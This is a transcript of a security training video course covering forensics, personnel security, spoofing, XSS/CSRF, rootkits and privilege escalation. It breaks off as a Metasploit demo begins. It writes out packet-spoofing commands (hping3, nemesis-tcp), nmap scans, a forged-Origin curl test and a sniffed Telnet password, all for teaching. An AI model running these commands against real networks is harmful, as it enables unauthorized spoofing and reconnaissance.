Files. And immediately we can see the number of files that it's found that were removed from the hard disk on
this system. So we can see the name of the file, the folder it was in, the size and the modification date and
timestamp, although the modification column is cut off a little bit currently in the display. But we can widen
that after the fact.
Now we have the choice of selecting either a single file. [The presenter selects a few files by using the Control
and Shift option.] Let's just verify that we can see the modified column. Or we could use Ctrl-click to select
non-adjacent multiple files or even Shift-click for adjacent files. The idea is that we select these files because
we then have the option of clicking the Restore by Copying button at the bottom right. [The Save As dialog
box opens.] And we can determine exactly where it is that we want to restore those entries. Now at the same
time we should also bear in mind there are other tools that we might use to look at deleted files. Here I've got
the EnCase Enterprise tool [He switches to the EnCase Enterprise Edition window. The window includes a
menu bar below which are several buttons for New, Open, Save, and Print. Below the buttons, the window is
divided into three sections. The first section includes nodes such as Cases and subnodes named Case 1 and C.
The second section displays many files in a tabular format. Some of the column headers are name, Filter, In
Report, File Ext, and File Type. The third section is below the first two sections. ] where I've already created a
case file and acquired the contents of drive C, as you can see clearly here. So of course, we can peruse drive C
and see what's there at the point of time that this evidence was acquired. But it's always important to think
about making sure [He right-clicks the C subnode.] that there's no tampering with evidence. Of course, that
means following the chain of custody. One aspect of that is to create a hash. So here in EnCase, I could right-
click on drive C and choose to generate a hash [He selects Hash from the shortcut menu and the Hash window
opens.] for all sectors on this partition, or I could specify a subset. Of course, at the Windows command
line, [He switches to the Windows PowerShell window.] for instance, in PowerShell, we can use the get-
filehash cmdlet, [He refers to cmdlet get-filehash and the hash EDABA50089717400A673F3972DA4D379702FD08A8FA7123749745E6C9BE3C2D6.] given a file name to
result in a hash. Now the idea is that when we generate a hash in the future and compare it to this hash, if
anything's changed, the hash will be different and so we'll know that something has changed. [He switches to
the EnCase Enterprise Edition window.] And the same thing is true here in the EnCase tool. [He switches to
the Disk Scrubber v3.4 window.] There are plenty of tools available for scrubbing or wiping disks. [The Disk
Scrubber v3.4 window includes the Drive to Scrub drop-down list box which displays the options available.
The window also includes the Priority drop-down list box and adjacent to it is the Scrub Drive button. Radio
buttons for the options Normal (Random Pattern Only), Heavy (3-Stage Pattern, 0s+Rnd), Super (5-Stage, 0s+1s+Chk1+Chk0+Rnd), and Ultra (multi-stage, DoD recommended spec w/Vfy) are displayed.] Here I'm looking
at the Disk Scrubber tool where we can choose the disk that we want to sanitize, essentially. We can scrub it
and we can also determine exactly how that's going to happen where we can have multistage overwrites of
randomized data. Now this way, if a disk is wiped in a thorough manner, it makes it much more difficult for
anyone to acquire any data remnants in the future. In this video we discussed how to view deleted files on a
hard disk.
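As a rough illustration of the hashing idea described above, the commands below show how an acquired image could be baselined and later re-verified on a Linux analysis workstation; the file name is just a placeholder and this isn't the exact workflow shown in the demo.

sha256sum evidence.dd > evidence.dd.sha256    # record the hash at acquisition time
sha256sum -c evidence.dd.sha256               # later: recompute and compare against the recorded hash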
[Topic: Hiring and Background Checks. The presenter is Dan Lachance.] Taking the time up front to be very
careful about which employees get hired in a company can pay dividends over the long term. In this video,
we'll talk about Hiring and Background Checks. The first core item that we must consider is how qualified an individual is for a given job role. Do they have the correct skill sets? Are they suitable, in terms of their personality, for what's expected of them, and are they trustworthy? Job descriptions, then, must be detailed and
well-written to attract the appropriate candidates. Also, certain positions might have access to classified data or
sensitive information. And as such, it might be especially important to conduct a thorough background check
for this type of position. Competencies for potential employees might require that teamwork, leadership, and a proven background of ethics be demonstrated within the job role. There are also different types of reference checks for potential employees, like personal references that might be able to attest to the character of the individual. Work references, of course, lend a lot of insight into the past work history of an individual. A
thorough background check could uncover additional information not disclosed by the potential employee. We can use the results of that check to help make a hiring decision, because it might be related to minimizing future lawsuits, or even to identify falsifications perpetrated by the potential employee, related to things like their work history, their past job roles and duties, or their reasons for leaving jobs. It might also bring to light a past criminal history.
The benefits of thorough background checks, even though they might cost more and take more time up front, include reduced overall hiring costs, protection against potential lawsuits, lower employee turnover, and the identification of criminal activity. So over the long term, what we're doing is being very selective about who gets
hired to ensure the best possible candidate is filling a job role. Other things that might be done with
background checks and employee hiring include polygraph tests, or drug tests, or even personality testing.
There's also the timing that we must think about, in terms of which items should be done prior to hiring, such as completing a background check for criminal activity. And even after people are hired, it's important, in terms of timing, that we periodically re-investigate some of these aspects. This might include periodic drug testing of employees. Then there's also the financial side of things,
such as conducting a credit check by looking at the credit history of either potential new employees or even
existing employees. The reason this can be important is because people in desperate financial situations will
sometimes resort to desperate attempts to get money, perhaps to pay off lenders. And so over time we might be
able to shed light on this actually happening in the organization where people that have access to customer
credit card numbers might actually be using them fraudulently. Driving records might also be very important,
certainly if the job position involves driving for company business. You might also want to validate social
security numbers to make sure that they actually exist. You might also want to have a cross reference check
against a terror watch list for potential employees. In this video, we discussed Hiring and Background Checks.
[Topic: User Onboarding and Offboarding. The presenter is Dan Lachance.] Most organizations have a
specific hiring and termination set of procedures for users. And in this video, we'll take a look at user
onboarding and offboarding. With user onboarding, there's often an employment agreement and acceptable use
policies that the user must sign off on, prior to starting employment. These documents often include company
rules and restrictions, and will include various security policies and acceptable use policies, for example, email
and VPN acceptable use. It will certainly include a job description of what is expected of the user, and any consequences that may follow when rules are broken. Of course, the
employment agreement will also detail whether it's a term or a permanent position, or detail things like the
length of employment. In some cases, a non-disclosure agreement, or NDA, must be signed by the new
employee, to protect confidential information. Such as trade secrets, proprietary company information, or, if
the user is dealing with legal contracts, they'll often have to sign an NDA related to that. So essentially an
NDA, or non-disclosure agreement, is an agreement to not disclose sensitive information. Violations could
result in strict penalties, including being terminated. User onboarding often includes the creation of a new user
account and group membership, to give access to specific resources. It might also include the issuance of
various access cards to access a parkade, or a building, or even a certain floor in a building.
User training is often conducted so that users are aware of how procedures are run within the organization, and
also should include security training. With user offboarding, often many companies will conduct an exit
interview, to determine what the user thought of their experience and what might need to be improved. User
offboarding also means environment security, which includes things about physical aspects of what the user
was doing in the company, such as their workspace and any equipment that they physically had access to. User
offboarding must also stipulate what would be done with disgruntled employees that need to be removed from
the premises. Often, this means they need to be escorted by security personnel. Employee temperament also
plays a part in user offboarding, where some disgruntled employees might become belligerent or violent. So
terminations, then, need to be planned ahead of time within the organization. There should be a specific
defined procedure that is known by HR and other related individuals.
This could also be something that's done in a private environment, such as within a single organization, or even
within a department within the organization. So documentation needs to be prepared describing how terminations
should occur. And the idea is to reduce any negative incidents, including data leakage, when users are
offboarded. Employee equipment includes things like mobile devices, such as smartphones and tablets,
laptops, vehicles, and so on. So it's important that this equipment be returned and properly sanitized if needed.
There's also the computer account of a user, any email or VPN accounts that they were given access to, that
would either have to be suspended or disabled, or removed according to company policy. HR, of course, must take into account the final paycheck that is owed to the employee. Both IT security and physical security personnel must be notified that a user is leaving the company. Often a witness is required
when a user is being terminated, that could be a manager or a security official within the organization. It's also
important to obtain any ID or badges or keys that were issued to the employee upon hiring. Once terminated,
the user might be escorted off premises and told that they're not allowed to return. In this video, we discussed
user onboarding and offboarding.
[Topic: Personnel Management Best Practices. The presenter is Dan Lachance.] In this video we'll talk about
Personnel Management Best Practices. For users within the organization there needs to be ongoing
supervision. There should be periodic performance reviews through which we can compensate well-performing users or recognize them for their contributions to the organization. Performance reviews can also be used to develop
skill sets for employees in terms of future ambitions for acquiring certain certifications or other job roles
within the company. The performance review can also define the training requirements in order for a user to
reach those goals. Performance reviews can also shed light on the overall morale of users within the company.
Job rotation is used to reduce the risk of collusion by placing people in different jobs on a periodic basis. Any
fraudulent or unauthorized activity could come to light when a new user takes on a job role handled by another
user previously. Separation of duties ensures that one employee isn't solely responsible for all of the parts of a
business process, from beginning to end. Succession planning is also important to ensure that we always have
additional candidates that are suitable for a job role for a user that might leave the organization, or might, for
example, retire within a period of time.
Dual control requires at least two people to be involved with a specific business process. The idea here is that
we reduce the possibility of fraudulent activity. Although we aren't eliminating the possibility of collusion
between those two or more persons. Cross training allows us to make sure that all of our eggs aren't in one
basket. So that we're not dependent upon a single employee to perform a special job role, especially if it's
crucial to business operations. The principle of least privilege states that we should grant only the required
permissions for a user to perform a job role and nothing more. Periodically, we can check that this is being
adhered to through various audits. Mandatory vacations not only ensure that employees are refreshed, well rested, and ready to come back to work and be productive, but they also allow the identification of abnormalities in their job roles while someone else fills in for them. In this video,
we discussed Personnel Management Best Practices.
[Topic: Threats, Vulnerabilities, and Exploits. The presenter is Dan Lachance.] In this video we'll talk about
Threats, Vulnerabilities and Exploits. The first thing to say is that the terms are often confused. So the
distinction between Threats, Vulnerabilities and Exploits is very important for a number of reasons. Such as
when we take a look at documentation that refers to these terms, or in the crafting or use of organizational
security policies. It's important to understand that when we talk about security the weakest link in a chain
essentially defines your security posture, so it's important that we identify those weak links and do something
about them. With a threat we need to have an inventory of assets that need to be protected against those threats.
So an asset inventory then allows us to perform a threat analysis against those assets. We can then determine
what kind of negative impact against an asset might be realized. So essentially this is an impact analysis.
Assets and threats need to be prioritized so that way, energy and resources can be allocated accordingly. A
vulnerability is a weakness. It could apply at the hardware level where we're running out of date firmware for
instance on a wireless router that has known vulnerabilities or it could be the lack of physical security controls.
Maybe servers aren't behind a locked door. At the software level, a vulnerability could be exposed until software
updates are applied. Often software updates address this type of issue. But sometimes a software
misconfiguration can present a vulnerability that can be exploited by a malicious user. In some cases, even sticking with the default settings in some software can mean that we've got vulnerabilities.
An exploit takes advantage of a vulnerability or weakness. Now this can be done legitimately when we
conduct penetration testing to identify these vulnerabilities that actually can be exploited because then we can
mitigate them in some way. But at the same time malicious users might exploit a known vulnerability if we
haven't put a security control in place to mitigate that vulnerability. Zero-day exploits are those that are not known by vendors or the general IT security community. However, they are known by one or more malicious users who can take advantage of them. In some cases zero-day exploits might be indirectly detected with some
kind of intrusion detection or prevention system. Because it's really looking for suspicious activity out of the
norm, which could indicate a zero-day attack of some kind. An example of a threat would be the loss of data
availability. Now that could be for numerous reasons because a server has crashed or because files have been
locked due to ransomware. A vulnerability might be the lack of user awareness and training that might lead to
something like ransomware where the user opens up an email and opens up a file attachment that they didn't
ask for or weren't expecting. The exploit of course would trick the user somehow into opening something like
a file attachment that would spawn ransomware. In this video, we discussed threats, vulnerabilities, and
exploits.
[Topic: Spoofing. The presenter is Dan Lachance.] Forgery has been around for a long time. Whether it's in
the form of a forged signature, a fake passport, or even counterfeit money. In this video, let's talk about
spoofing. Spoofing is forgery, and in the digital IT world, there are many different types of spoofing attacks to
fake an identity. This includes MAC address spoofing, which might be used by malicious users so that they
can make a connection to a wireless access point that uses MAC address filtering. IP address spoofing might
be used to defeat basic packet filtering rules that are simply based on a source network range or IP address.
DNS spoofing is often called DNS cache poisoning. Essentially, an attacker can compromise either the local hosts file on a device or a DNS server, so that when a user attempts to connect to a friendly name, they're instead redirected, unknowingly, to a fraudulent website that looks like a legitimate one. Email
spoofing is an email message that appears to come from a valid email address, where the email address was
actually completely faked.
And this is possible in some mail systems. Man-in-the-middle attacks are used to interrupt communication
between two parties by forging the identity of one of the parties and knocking that party offline. Now this
would be unknown to the other end of the communication. Session hijacking has many different attack types,
including IP spoofing. Now, with a man-in-the-middle attack, we are essentially interrupting the
communication between two parties. There are many ways that this can be perpetrated, including through SSO,
or simply through IP spoofing. SYN scanning can also be combined with spoofing attacks. With SYN scanning, the malicious user attempts to set up a TCP connection with a host at different port numbers. Now, this is done by sending a synchronization or SYN packet. And often, this is done to attempt to fake the initiation of a three-way handshake to different services running on a server.
There are many freely available tools that can be used to spoof packets. So, for example, pictured on the screen
we're seeing the use of the nemesis-tcp tool. [Dan explains the following line on screen: nemesis-tcp -v -S
200.1.1.1 -D 56.37.87.98 -P /fakepayload.txt] Where -v turns on verbose screen output. -S specifies the source
that we want this to appear to have come from. -D is the destination we're sending this traffic to. And -P
specifies the location of a payload file, where we could determine whatever we want to be seen in this
transmission from a simple text file. So as you can see, it's very easy to forge an entire TCP packet. Any
network intrusion detection or prevention tools, even host intrusion detection and prevention tools that might
look at packets, would probably not be able to identify that this is forged. Unless you're using some kind of encryption and digital signing at the packet level, it's pretty hard to determine whether what you're looking at on the network has been forged or not. In this video, we discussed spoofing.
[Topic: Packet Forgery using Kali Linux. The presenter is Dan Lachance.] Spoofing means forgery. In this
video, I'll demonstrate how to forge packets or how to spoof packets using tools available in Kali Linux. [The
root@kali:~ command prompt window is open. The following command is displayed on screen: cat
fakepayload.txt. The output is as follows: This is fake data used in a spoofed packet.] There are plenty of tools
out there for different platforms, including Windows, where you can create your own packets completely,
entirely, including the payload and all header fields and then send it out on the network. Whether it's a wired or
wireless network. So here in Kali Linux, I've created a file called fakepayload.txt and I've catted it here using
the cat command so we can see what's in it. It simply says this is fake data used in a spoofed packet. What
we're going to do here is we're going to use the hping3 command to forge or create a fake TCP packet. So I'm
going to type hping3, that's the command. What I want to do is send this to a target at 192.168.1.1. So I'm
going to be placing a packet or packets out in the network. That's where they're going. That's the destination.
Now I'm going to use --spoof. And I want it to look like it's coming from a host at 4.5.6.7. So I'm forging that
or really I'm spoofing that. The next thing I want to do is give it a TTL, let's say of 31. The TTL value in the IP
header field is decremented each time a packet goes through a router.
And so different operating systems start off with different TTL values like 127 or 255, 128 and so on. So this
is going to indicate then that the packet appears to not have originated on the local subnet even though it
actually has. I'm going to give it the --baseport of 44444. In other words, this is a higher level source port, for
example, from a client. And the --destport, destination port, let's say is port 80. So it looks like it's going to
port 80 and this is a transmission from a client so it's a higher level port number. And finally, I'll use -E and I'll
tell it I want to use my fakepayload.txt file. And I'll just make sure that I put in -d 150, to make sure I'm telling
it a size that can accommodate what's in my fake payload. Now, before I press Enter, I'm going to start a
Wireshark packet capturing session. Like Kali Linux, Wireshark is another free tool that you can download
and use. [The Wireshark Network Analyzer Window is open. Running along the top is a menu bar with various
menus such as File, Edit, View, and so on. Below that is a toolbar with several icons such as save, refresh, and
so on. Below that is a Filter field with the following entry: ip.dst==192.168.1.1. Next to this field is a drop-
down icon and three options, which are Expression, Clear, and Apply. The rest of the window is divided into
four sections, which are Capture, Files, Online, and Capture Help.] So here in Wireshark, I'll click the
leftmost icon [from the toolbar] to begin a packet capture. [The Wireshark: Capture Interfaces dialog box
opens. It lists various network interfaces with IP addresses. There are three buttons at the end of each line,
namely Start, Options, and Details. There are also two buttons at the bottom of the dialog box, namely Help
and Close.] I'm going to select the appropriate network interface here, where I've got traffic on my machine
and I'll click Start. [Dan clicks the start button corresponding to IP address 192.168.1.157.]
And at this point, it's capturing network traffic. [The Capturing from Microsoft - Wireshark page opens in the
window.] I've already got a filter here where the IP destination equals 192.168.1.1. Notice nothing is listed
because we haven't yet injected our fake packet. All right, [The screen switches to root@kali:~ command
prompt window.] so now that we're capturing network traffic, let's go ahead and send out our fake traffic. So
I'm going to press Enter back here. [Dan executes the hping3 command that he had previously typed.] Even
though I've got a message saying operation not supported, can't disable memory paging, it's all good. It is
continuously transmitting those forged packets. Now, if we switch over to Wireshark we're going to see just
that. Notice here in Wireshark, [He switches back to the Wireshark window.] we have what appears to be
traffic coming from 4.5.6.7, destined for 192.168.1.1 and it keeps going. Let's stop the capture with the fourth
icon from the left [on the toolbar] and let's just click on one of these. [He selects one of the packets.] So, if we
were to examine the ethernet header, well, we've just got some MAC address information. And we certainly
could have spoofed the MAC address, although we didn't in our case. Here in the IP header, notice that we've
got interesting things, like the TTL, the Time to Live is actually set to a value of 31. And the source and
destination IP addresses are as per what we instructed.
And if we go a little bit deeper, you can see down here in the text portion of the payload, it says this is fake
data used in a spoofed packet. So clearly, the message here is that it's very easy to craft or create forged traffic
and put it out on a network. Now, there are many intrusion detection and prevention systems, but even if you're just periodically capturing network traffic, you need to take what you see with a grain of salt. Just because you
see a specific piece of traffic on the network, it doesn't mean it actually is legitimate and originated from where
it appears to have originated. In this video, we learned how to forge packets using Kali Linux.
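To recap, the hping3 command that was assembled piece by piece in this demo looks roughly like this on a single line, using the same addresses, ports, and payload file mentioned above:

hping3 192.168.1.1 --spoof 4.5.6.7 --ttl 31 --baseport 44444 --destport 80 -d 150 -E fakepayload.txt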
Upon completion of this video, you will be able to recognize how impersonation can be used to gain
unauthorized access.
Objectives
[Topic: Impersonation. The presenter is Dan Lachance.] In this video, I'll talk about Impersonation. One form
of impersonation is social engineering, where a malicious user might pose as someone from the help desk,
asking a user for their current password, which is required for a password reset. Now this might happen over
the telephone, or it might come through a spoofed email message. In the same way, a malicious user could
pose as a telecom provider to gain physical access to a wiring closet. Or, they could pose as a banker or a bank
that a user does banking with in order to gain access to their specific account details. And again, that could
happen over the phone or most often, through an email message with a link to a fraudulent site. At the user
level, impersonation can take the form of a user connection to a web app, in other words, a session. At the
device level, we could be using a device to establish a VPN session. And that connection possibly could be
impersonated. But in order for this type of impersonation to take place in a web application session or VPN
session, a lot of things have to go right for the attacker. This is where a man-in-the-middle attack comes in,
which is often called an MitM. This is a real time exploit where we originally have two communicating parties
that are both legitimate. However, we have an attacker in the middle. Now, both parties will assume that they
are communicating directly.
They don't know that there's someone in the middle that's capturing the conversation and perhaps even
modifying messages before they're relayed to the other party. Although, with a man-in-the-middle attack, the messages don't necessarily have to be modified, but they are being caught or viewed and then relayed off to
the other party. So in some cases when that data is altered, it means that the man-in-the-middle attacker has the
ability to do things like alter the course of a banking transaction, and so on. In man-in-the-middle SSL or TLS attacks, a compromised system might be configured to trust certificates from any authority. Now,
today's devices, including smartphones, have a certificate store where they have a number of trusted root
certificates. Now these trusted root certificates are used when the device connects to, for example, a VPN that
uses certificates or an HTTPS website, and they will look at the signer of the certificate, for example, to that
HTTPS website, to see if they trust the signer. Now the problem is that most of today's devices have way too
many trusted root certificates. And as a matter of fact, if any of them are compromised, so are all of their
certificates, potentially. So, when an attacker potentially compromises a system, what he or she could do, is
install a trusted root certificate authority under their control.
Now, what this means then, is that a client that would connect to a protected HTTPS web server, for instance,
would then trust that signer. And therefore, the user wouldn't get a warning that the site shouldn't be trusted.
Now, clients don't normally require a PKI certificate in this kind of example, but servers do. Another aspect to
consider with impersonation is a compromised private key. When we talk about a PKI digital security
certificate, we are also implying that there is a public and private key pair that is unique and issued to a user, a
device, or an application. Well, if the private key is compromised somehow by a malicious user, then that
malicious user can essentially act, or do things on behalf of the owner of that private key. They can digitally
sign messages. Or they could decrypt messages that were intended to only be decrypted by the owner of the
private key. One way that a private key can be compromised is by brute force guessing. So, for instance, if a
user exports their private key to a file and uses an easy to guess password. And perhaps they store that on a
USB thumb drive which is lost or stolen. It's possible that it could be compromised simply by guessing
passwords. Impersonation also deals with session hijacking, essentially taking over a previously established session. And this is part of what can happen with a man-in-the-middle attack. There are various types of
session hijacking examples related to varying protocols like HTTP and FTP. However, in some cases, the
original legitimate station that is being taken over, essentially, in the communication, may be taken offline by
the attacker. So what are some countermeasures then for man-in-the-middle attacks and session hijacking?
Some of them are common fare, such as hardening devices, using dedicated servers for network services where
we don't collocate other network services on the same host. We might also consider using network and host firewalls, at both levels, to control inbound and outbound traffic.
The use of intrusion detection and prevention systems, or IDS and IPS systems, is highly recommended to
detect suspicious activity. We should also consider trimming down the list of trusted certificate authorities on
all devices. Otherwise, we really have an increased attack surface that really isn't necessary in most cases. As
always, user awareness and training of this possible security vulnerability is always important. We should also
make sure that we don't rely solely on IP address blocking, or even MAC address blocking for that matter.
When it comes to our security counter measures, they're good as one layer. But they shouldn't be the only thing
that's required because addresses are easily spoofed with freely available tools. In this video, we talked about
Impersonation.
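As a quick, hedged side note on the trusted-certificate discussion above, one way to see which authority actually signed the certificate a server presents is a sketch like the following; the host name is only a placeholder, not something from the demo.

openssl s_client -connect www.example.com:443 -servername www.example.com </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer -dates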
[Topic: Cross-site Scripting. The presenter is Dan Lachance.] There are many crafty ways that malicious
users can force the execution of malicious code on machines. In this video, we'll discuss cross-site scripting. A
cross-site scripting attack begins in step 1, with an attacker injecting some kind of script code into a trusted
web site. Now this normally happens, for instance, through a field on a web form that isn't properly validated.
In other words, it might allow the user to input anything before the data gets saved and uploaded to the server.
Now usually what the attacker is doing is they are injecting their malicious code into server side scripts. In step
2, an unsuspecting user of that same site then executes the script. In step 3, the script is now running on the
unsuspecting user's computer locally in their browser. And could potentially access their cookies in their web
browser or other session details. Most modern web browsers are sandboxed, which means that anything running in the context of that web app will not affect anything outside of that web application. They can't talk to the
operating system kernel and so on. But it depends on the version of the web browser and use on the client
device and how it's configured.
Cross-site scripting is often simply referred to as XSS. So what can we do about it? Well, some
countermeasures include filtering inputs. So we want to make sure that developers are following secure coding
guidelines. And that they are carefully validating every field on a web form, or even validating URL strings
sent to a server to be parsed, to make sure that only acceptable data exists. As always, user awareness training
is also very crucial. So that if a user notices some kind of suspicious activity or behavior in their browser, they
should generally be aware that maybe something is up, there could be some kind of a cross-site scripting attack
taking place. In other cases, cross-site scripting attacks execute code on a client machine in the background
where there may not be any visual indicator, at least at the time of the attack. Another type of attack is a cross-
site request forgery, which is often referred to as a CSRF. In this type of attack, code gets executed for a user
that's already authenticated to a web service. Now that code is executed by an attacker, not by the user. The
user doesn't know about it. So one way this could happen is for an attacker to compromise a user's system and then have the ability to send a user authentication token that's been modified by the attacker to the web app.
Now this can be done by the attacker making changes to, or perhaps, modifying and sending off a web browser
cookie to a web app that already trusts that there is an established session in place. So the attacker then could
transmit instructions to the server without user consent. This could also take the form of a URL that the user is
tricked into clicking on. Maybe to transfer funds to a different account at a different banking institution and so
on. There are countermeasures that we can apply here to mitigate the effect of cross-site request forgeries. First
of all, the web application, server side, can ensure that requests came from the original session. There are many techniques that developers would usually put in place, following secure coding guidelines, to make this happen.
Now, one would be to check the origin header in the HTTP request to make sure that it's valid and matches the
site. Or to use some kind of a challenge token that's unique to each session. Or to use some kind of a
randomized hidden cookie value that gets checked every time the cookie is sent to the server. Users, of course,
should not leave authenticated sessions open. So, for example, if a user is working with their email online or
working with online banking, as soon as they're finished with it, they should log out and not wait for the time
out to occur. At the same time, users should never save passwords for web applications. In this video, we
talked about cross-site scripting.
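As a loose illustration of the origin-header countermeasure mentioned above, a tester might send a request with a deliberately mismatched Origin header and confirm that the application rejects it. Everything in this sketch, the URL, cookie value, and form fields, is hypothetical.

curl -i https://app.example.test/transfer -H "Origin: https://attacker.example.test" -H "Cookie: session=abc123" --data "amount=100&to=9999"

If the server honors a request like this one, the origin check is either missing or not being enforced.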
[Topic: Root Kits. The presenter is Dan Lachance.] In this video I'll talk about root kits. A root kit is a form of malware and it can apply to the Windows platform or the Unix or Linux platform, including at the smartphone level. So it's a form of malware that is usually delivered through a Trojan virus. A Trojan virus appears to be something useful or benign, like free downloadable software. However, in fact, it actually is used as a vehicle
to transport malware. So a root kit then creates a backdoor. A backdoor allows an intruder to keep elevated
access to a system or an application without detection. This can be done in many ways including by replacing
operating system files that allow and hide intruder access. For example, consider a root kit that replaces the
netstat command on the Windows and Linux platforms. The netstat command is usually used by administrators
to view any connections that are made to a machine on a given port or outbound connections made to other
machines on a given port. By replacing the netstat command, an attacker can hide the fact that they've got
some kind of a listener. Or that they've got some kind of a process that periodically reaches out to receive
instructions from some control center owned by a malicious user.
Kernel root kits exploit operating system kernels and their ability to be modular and expandable. Because if we allow access to the operating system kernel, we are allowing access to everything. And, in many cases, things like drivers are given operating system kernel privileges. So even installing a driver could be a vehicle for malware that could infect a system and install a root kit. Now a root kit could also replace many files. It's not as if it has
to replace a single file. So in the case of hiding listening network sockets, as per our netstat example, we have to know what a socket is. A socket is a combination of a protocol plus a host and a port, such as http:// followed by a host name, a colon, and then a port number. Other kernel root kits will actually hide files that aren't seen with normal
operating system commands. These files might contain illegal data or they might contain additional malware
payloads. Now we could also have running processes that are hidden from normal operating system tools like
the Windows Task Manager or the Linux ps command. There's also the possibility of kernel root kits being
spawned due to some hidden configuration somewhere such as in the Windows registry or within a Unix or
Linux configuration or .conf file. Now bear in mind, in order for a kernel root kit to be installed in the first
place, at some level the machine has to be compromised. Countermeasures to root kits include hardening the
network as well as hosts on the network.
And of course running up-to-date antimalware that might detect a root kit. There are also specific anti-rootkit
tools available from various vendors. Examples include the Malwarebytes Anti-Rootkit, or the McAfee
RootkitRemover. The use of intrusion detection and prevention systems is also really important in this case to
detect suspicious activities such as the replacement of operating system files. In the Windows world, user
account control, or UAC, can also be beneficial in that it can prompt the user of the system before anything
happens in the background, such as making a change to the registry to spawn some kind of a root kit. Also, on the Unix and Linux platforms, we might consider disabling loadable kernel modules, or LKMs. In other words, for what's required for the kernel to function properly, things like IPv6, which may be turned on or off from the kernel, or additional drivers, we want to make sure perhaps that they are compiled into the Linux kernel where possible. In this example, [The Malwarebytes Anti-Rootkit BETA v1.09.3.1001
wizard is open. The wizard is divided into two parts. The first part is titled Overview, and it contains four
options that are Introduction, Update, Scan System, and Cleanup. The Scan System option is selected by
default. The second part displays the contents of the option selected in the first part. This part displays a Scan
Progress section, which contains three checkboxes, namely Drivers, Sectors, and System. It also has a Scan
button. At the bottom of the wizard are two buttons, Previous and Next.] you can see the Malwarebytes Anti-
Rootkit tool that's been installed on this system. Where down below, the scan targets that it will look at include
drivers, sectors on the disk, as well as the entire system. So I'm going to leave them all checked on and I'm
going to go ahead and click the Scan button. In this video we talked about root kits.
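As a hedged example of checking a Linux host along these lines, the commands below list the currently loaded kernel modules and verify packaged binaries such as netstat against their recorded checksums. The debsums utility applies to Debian-based systems and is an assumption here, not something shown in the demo.

lsmod                      # list loaded kernel modules; unexpected entries deserve a closer look
debsums -s net-tools       # report packaged files whose checksums no longer match (requires the debsums package)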
After completing this video, you will be able to explain the concept of privilege escalation.
Objectives
[Topic: Privilege Escalation. The presenter is Dan Lachance.] In this video, I'll talk about privilege escalation.
Privilege escalation is the unintended granting of elevated privileges to unauthorized parties. There are many types
of attacks that can result in privilege escalation, such as social engineering, to trick someone into divulging
things like credentials. Or packet sniffing tools, which can capture network traffic to reveal vulnerable items,
such as clear text passwords. Consider the example of using Wireshark to capture network traffic, which we
see the result of here on screen. [The Telnet from Windows to BSD.pcapng page is open in Wireshark
window.] I'm going to filter this packet capture for Telnet traffic. Telnet is often used to remotely administer a
device. [Dan types telnet in the Filter field.] Like a switch or a router or even an operating system. However,
the problem with Telnet is nothing is encrypted. We really should be using SSH instead. So let's filter this
packet capture for Telnet. We can see we have a number of Telnet packets here. So I'll now go to the Analyze
menu. And I'll choose Follow TCP Stream. [from the drop-down.] And immediately we can see that the
password for user student has a value of chicago. [The Follow TCP Stream window opens.] So this is one way
where we could elevate privileges for the target where this set of credentials was used.
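The same check can be approximated at the command line with tshark, Wireshark's terminal counterpart; the capture file name here is a placeholder, and the stream number may differ in practice.

tshark -r capture.pcapng -Y telnet                    # display only the Telnet packets
tshark -r capture.pcapng -q -z follow,tcp,ascii,0     # reassemble the first TCP stream, similar to Follow TCP Stream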
And now we have a way to get into that device. Other attack types include buffer overflows, where data goes
beyond allocated memory, for example, for a variable tied to a field on a form. So often, developers can ensure that this doesn't happen by validating input lengths and never writing more data than the memory allocated for a specific data type can accommodate. Also, privilege escalation might result from a compromised system, where an attacker has installed a rootkit. Or brute-forcing credentials for a privileged account could reveal the
password. Reconnaissance also can reveal things like service accounts that don't have any passwords, that an
attacker might take advantage of. Privilege escalation begins with a malicious user learning of systems through
reconnaissance techniques. That might include a ping sweep to get a list of hosts that are up on a network, but
they have to be on the network in the first place to do that. The next thing would be that the malicious user
would learn as much as possible about the systems that are up and running.
This can be done through enumerating ports, services, user accounts, and anything else that responds, using
freely available tools. This could lead to the attacker being able to compromise an unprivileged user account,
which they could then log in with to learn more. Eventually they might be able to compromise a privileged
user account. Which would allow them to do things like installing a rootkit to ensure that they have continued
future access through a hidden mechanism. Of course, attackers will then hide traces of the compromise,
perhaps by modifying log entries. What can we do about privilege escalation type of attacks? Well, hardening
is always something that is an option. We can apply firmware and software updates to all devices. We can
make sure that we are aware of software flaws, so that we can put controls in place to mitigate them. So for
example, if we absolutely must use insecure protocols like Telnet or FTP, maybe using it through a VPN
tunnel would be an acceptable mitigation. We should also be aware of configuration flaws. So depending on
how a tool or a piece of software is configured, it could lead to a vulnerability. In this video, we talked about
privilege escalation.
In this video, learn how to distinguish between common exploit tools.
Objectives
[Topic: Common Exploit Tools. The presenter is Dan Lachance.] In this video, we'll talk about Common
Exploit Tools. The first thing to consider is the fact that tools themselves are not malicious. Rather, it's how the
tools are used that can be malicious. There are plenty of freely available tools that can be used legitimately by
IT technicians to test the strength of their networks and hosts on those networks. But in the wrong hands those
same tools could be used to exploit vulnerabilities for purposes that are nefarious. Common Exploit Tools are
available for all platforms. So, Windows based as well as Unix and Linux based. In some cases some of the
exploit tools can even run on a mobile device. Some of the tools are for free and other tools are not. Some
common examples of tools include dsniff. dsniff is a suite of tools that are used for network auditing and
penetration testing, where there is a focus on trying to sniff out network passwords. Webmitm stands for web man in the middle.
This is both a packet sniffing tool as well as a transparent proxy that can relay messages to another party, both
of which are required for a man in the middle attack. Nemesis is a packet creation and injection tool that allows
us to quickly and easily spoof any type of network packet. In Aircrack-ng, ng stands for next generation, and it allows
us to crack Wi-Fi WEP, WPA, and WPA2 keys. Nessus is a widely used vulnerability scanner that will be able
to tell us what kind of vulnerabilities exist on hosts on the network or even on a single host if that's what we
chose to scan. Nmap is a widely used network scanner to map out what's on the network. Wireshark is a widely
used packet sniffer that is available for free on various platforms. Capturing network traffic with a packet sniffer can reveal things that shouldn't be on the network, in terms of hosts or protocols that are in use, or even insecure mechanisms being used over the network. In this video we talked about Common Exploit Tools.
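For instance, a basic Nmap sweep of a subnet might look like the sketch below; the address range is only an example.

nmap -sn 192.168.1.0/24    # ping sweep to see which hosts are up
nmap -sV 192.168.1.0/24    # probe open ports and identify service versions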
During this video, you will learn how to use Metasploit tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Metasploit Suite of Tools. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to work with the Metasploit framework in Kali Linux. [The root@kali:/ command prompt
window is open. It displays the output of the following command: nmap -n -sV 192.168.1.242.] Metasploit is
